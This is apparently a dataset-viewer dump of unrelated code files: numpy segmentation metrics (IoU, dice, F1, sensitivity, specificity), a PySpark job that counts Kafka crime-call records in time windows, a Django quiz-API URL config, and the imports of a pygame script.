                  pairwise_pixel_stats(true, pred, num_classes=num_classes))
    iou = tp / (tp + fp + fn + eps)
    if clamp_absent:
        iou[_absent_inds(true, pred, num_classes)] = -1.0
    return iou
def accuracy_multiclass(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: int,
    eps: float = 1e-8,
    clamp_absent: bool = True,
) -> np.ndarray:
    """Compute multi-class accuracy for semantic segmentation masks.

    Parameters
    ----------
    true : np.ndarray
        Ground truth semantic mask. Shape (H, W).
    pred : np.ndarray
        Predicted semantic mask. Shape (H, W).
    num_classes : int
        Number of classes in the training dataset.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.
    clamp_absent : bool, default=True
        If a class is not present in either true or pred, the value of that
        index in the result array will be clamped to -1.0.

    Returns
    -------
    np.ndarray:
        Per class accuracy-metrics. Shape: (num_classes,).
    """
    # Per-class TP/FP/FN pixel counts are on the diagonals of the pairwise
    # statistic matrices; TN is everything else in the image.
    tp, fp, fn = (mat.diagonal() for mat in
                  pairwise_pixel_stats(true, pred, num_classes=num_classes))
    tn = np.prod(true.shape) - (tp + fn + fp)
    accuracy = (tp + tn) / (tp + fp + fn + tn + eps)
    if clamp_absent:
        accuracy[_absent_inds(true, pred, num_classes)] = -1.0
    return accuracy
def f1score_multiclass(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: int,
    eps: float = 1e-8,
    clamp_absent: bool = True,
) -> np.ndarray:
    """Compute multi-class f1-score for semantic segmentation masks.

    Parameters
    ----------
    true : np.ndarray
        Ground truth semantic mask. Shape (H, W).
    pred : np.ndarray
        Predicted semantic mask. Shape (H, W).
    num_classes : int
        Number of classes in the training dataset.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.
    clamp_absent : bool, default=True
        If a class is not present in either true or pred, the value of that
        index in the result array will be clamped to -1.0.

    Returns
    -------
    np.ndarray:
        Per class f1score-metrics. Shape: (num_classes,).
    """
    # Per-class TP/FP/FN pixel counts from the pairwise matrix diagonals.
    tp, fp, fn = (mat.diagonal() for mat in
                  pairwise_pixel_stats(true, pred, num_classes=num_classes))
    f1 = tp / (0.5 * fp + 0.5 * fn + tp + eps)
    if clamp_absent:
        f1[_absent_inds(true, pred, num_classes)] = -1.0
    return f1
def dice_multiclass(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: int,
    eps: float = 1e-8,
    clamp_absent: bool = True,
) -> np.ndarray:
    """Compute multi-class dice for semantic segmentation masks.

    Parameters
    ----------
    true : np.ndarray
        Ground truth semantic mask. Shape (H, W).
    pred : np.ndarray
        Predicted semantic mask. Shape (H, W).
    num_classes : int
        Number of classes in the training dataset.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.
    clamp_absent : bool, default=True
        If a class is not present in either true or pred, the value of that
        index in the result array will be clamped to -1.0.

    Returns
    -------
    np.ndarray:
        Per class dice-metrics. Shape: (num_classes,).
    """
    # Per-class TP/FP/FN pixel counts from the pairwise matrix diagonals.
    tp, fp, fn = (mat.diagonal() for mat in
                  pairwise_pixel_stats(true, pred, num_classes=num_classes))
    dice = 2 * tp / (2 * tp + fp + fn + eps)
    if clamp_absent:
        dice[_absent_inds(true, pred, num_classes)] = -1.0
    return dice
def sensitivity_multiclass(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: int,
    eps: float = 1e-8,
    clamp_absent: bool = True,
) -> np.ndarray:
    """Compute multi-class sensitivity for semantic segmentation masks.

    Parameters
    ----------
    true : np.ndarray
        Ground truth semantic mask. Shape (H, W).
    pred : np.ndarray
        Predicted semantic mask. Shape (H, W).
    num_classes : int
        Number of classes in the training dataset.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.
    clamp_absent : bool, default=True
        If a class is not present in either true or pred, the value of that
        index in the result array will be clamped to -1.0.

    Returns
    -------
    np.ndarray:
        Per class sensitivity-metrics. Shape: (num_classes,).
    """
    # Per-class TP/FP/FN pixel counts from the pairwise matrix diagonals;
    # sensitivity (recall) = TP / (TP + FN).
    tp, fp, fn = (mat.diagonal() for mat in
                  pairwise_pixel_stats(true, pred, num_classes=num_classes))
    sensitivity = tp / (tp + fn + eps)
    if clamp_absent:
        sensitivity[_absent_inds(true, pred, num_classes)] = -1.0
    return sensitivity
def specificity_multiclass(
    true: np.ndarray,
    pred: np.ndarray,
    num_classes: int,
    eps: float = 1e-8,
    clamp_absent: bool = True,
) -> np.ndarray:
    """Compute multi-class specificity for semantic segmentation masks.

    Parameters
    ----------
    true : np.ndarray
        Ground truth semantic mask. Shape (H, W).
    pred : np.ndarray
        Predicted semantic mask. Shape (H, W).
    num_classes : int
        Number of classes in the training dataset.
    eps : float, default=1e-8
        Epsilon to avoid zero div errors.
    clamp_absent : bool, default=True
        If a class is not present in either true or pred, the value of that
        index in the result array will be clamped to -1.0.

    Returns
    -------
    np.ndarray:
        Per class specificity-metrics. Shape: (num_classes,).
    """
    tp, fp, fn = (mat.diagonal() for mat in
                  pairwise_pixel_stats(true, pred, num_classes=num_classes))
    # BUG FIX: the previous implementation returned tp / (tp + fp), which is
    # precision (PPV), not specificity. Specificity is TN / (TN + FP); the
    # true-negative count is derived the same way as in `accuracy_multiclass`
    # (all pixels that are neither TP, FP nor FN for the class).
    tn = np.prod(true.shape) - (tp + fp + fn)
    specificity = tn / (tn + fp + eps)
    if clamp_absent:
        specificity[_absent_inds(true, pred, num_classes)] = -1.0
    return specificity
|
import logging
import json
from pyspark.sql import SparkSession
from pyspark.sql.types import *
import pyspark.sql.functions as psf
# Schema for the incoming crime-call JSON records. Every column is declared
# StringType since the Kafka payload carries all fields as strings; only
# crime_id is marked non-nullable.
schema = StructType([
    StructField("crime_id", StringType(), False),
    StructField("original_crime_type_name", StringType(), True),
    StructField("report_date", StringType(), True),
    StructField("call_date", StringType(), True),
    StructField("offense_date", StringType(), True),
    StructField("call_time", StringType(), True),
    StructField("call_date_time", StringType(), True),
    StructField("disposition", StringType(), True),
    StructField("address", StringType(), True),
    StructField("city", StringType(), True),
    StructField("state", StringType(), True),
    StructField("agency_id", StringType(), True),
    StructField("address_type", StringType(), True),
    StructField("common_location", StringType(), True)
])
def run_spark_job(spark):
    """Run the streaming pipeline: read crime-call JSON from Kafka, count
    calls per crime type in 60-minute event-time windows, and print the
    running totals to the console every 30 seconds (blocks until the
    query terminates)."""
    # Kafka source: read the topic from the beginning, capped at 200 offsets
    # per trigger so a large backlog cannot overwhelm a single micro-batch.
    df = spark \
        .readStream \
        .format("kafka")\
        .option("subscribe", "nd.project.crimestats")\
        .option("kafka.bootstrap.servers", "localhost:9092")\
        .option("startingOffsets", "earliest") \
        .option("maxOffsetsPerTrigger", 200) \
        .option("maxRatePerPartition", 100) \
        .option("stopGracefullyOnShutdown", "true") \
        .load()

    # Show schema for the incoming resources for checks.
    df.printSchema()

    # The Kafka source exposes (key, value, ...) columns; only the JSON
    # payload in `value` is needed, cast from bytes to a string.
    kafka_df = df.selectExpr("CAST(value AS STRING)")
    # Parse the JSON payload against `schema` and flatten it into columns.
    service_table = kafka_df\
        .select(psf.from_json(psf.col('value'), schema).alias("DF"))\
        .select("DF.*")

    # example call_date_time string: '2018-12-26T13:32:00.000'
    with_timestamp = service_table.withColumn('datetime', psf.to_timestamp(service_table.call_date_time, "yyyy-MM-dd'T'HH:mm:ss.SSS"))

    # Keep only the columns needed downstream; the watermark lets Spark
    # discard window state more than 60 minutes behind the stream.
    distinct_table = with_timestamp\
        .select("original_crime_type_name","disposition", "datetime") \
        .withWatermark("datetime", "60 minutes")

    # Static lookup table for disposition codes, read once from local disk.
    radio_code_json_filepath = "/home/workspace/radio_code.json"
    radio_code_df = spark.read.json(radio_code_json_filepath, multiLine=True)

    # Rename disposition_code -> disposition so the column names match for
    # the stream/static join below.
    radio_code_df = radio_code_df.withColumnRenamed("disposition_code", "disposition")
    #print(radio_code_df.show())

    # Enrich the stream by joining against the radio codes on `disposition`.
    join_query = distinct_table.join(radio_code_df,"disposition")

    # Windowed counts per crime type, sorted for readable console output.
    count_query = join_query \
        .groupBy("original_crime_type_name", psf.window("datetime", "60 minutes")) \
        .count() \
        .sort("original_crime_type_name", "window")

    # Console sink in Complete mode: the full result table is re-emitted on
    # every 30-second trigger.
    query = count_query.writeStream \
        .format("console") \
        .queryName("pdb") \
        .outputMode('Complete') \
        .trigger(processingTime="30 seconds") \
        .option("truncate", "false") \
        .start()
        #.option("checkpointLocation", "/tmp/chkpnt") \

    # TODO attach a ProgressReporter
    query.awaitTermination()
if __name__ == "__main__":
    logger = logging.getLogger(__name__)

    # Local standalone session using all available cores, with the Spark UI
    # pinned to port 3000.
    spark = SparkSession \
        .builder \
        .master("local[*]") \
        .config("spark.ui.port", 3000) \
        .appName("KafkaSparkStructuredStreaming") \
        .getOrCreate()
    logger.info("Spark started")

    # Quiet Spark's default INFO logging before the streaming job starts.
    spark.sparkContext.setLogLevel("WARN")

    # Blocks inside awaitTermination() until the streaming query ends.
    run_spark_job(spark)

    spark.stop()
|
from django.urls import path, re_path
from . import views
urlpatterns = [
    # Quiz and question API endpoints.
    path('api/quiz_question/<int:pk>/', views.QuizQuestionDetail.as_view()),
    path('api/quiz_result/<int:quiz_id>/', views.QuizResult.as_view()),
    path('api/full_quiz/<int:pk>/', views.FullQuizDetail.as_view()),
    # <cate> uses the default str converter (any text without a slash).
    path('api/quiz_category/<cate>/', views.QuizCategory.as_view()),
    path('api/answered_quiz/', views.UserAnswered.as_view()),
    path('api/quiz_status_update/<int:pk>/', views.UpdateStatusQuiz.as_view()),
    path('api/create_quiz/', views.QuizCreate.as_view()),
    path('api/recent_quiz/', views.RecentQuiz.as_view()),
    path('api/top_quiz/', views.TopQuiz.as_view()),
    path('api/posted_quiz/', views.PostedQuiz.as_view()),
    path('api/liked_quiz/', views.LikedQuiz.as_view()),
    path('api/like_quiz/<int:pk>/', views.LikeQuiz.as_view()),
    path('api/submit_quiz/', views.user_submit),
    path('api/pending_quiz/', views.PendingQuiz.as_view()),
    path('api/upfile/',views.upload_file_quiz),
    path('api/search/', views.SearchQuiz.as_view()),
    # Catch-all route: must stay last, or it would shadow every API path
    # above. Hands any unmatched URL to the index view.
    re_path(r'^.*$', views.index),
]
## Standard Include Stanza
from __future__ import division
import pygame
from pygame.locals import *
import sys
import getopt
import csv
import time
import os
import random
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.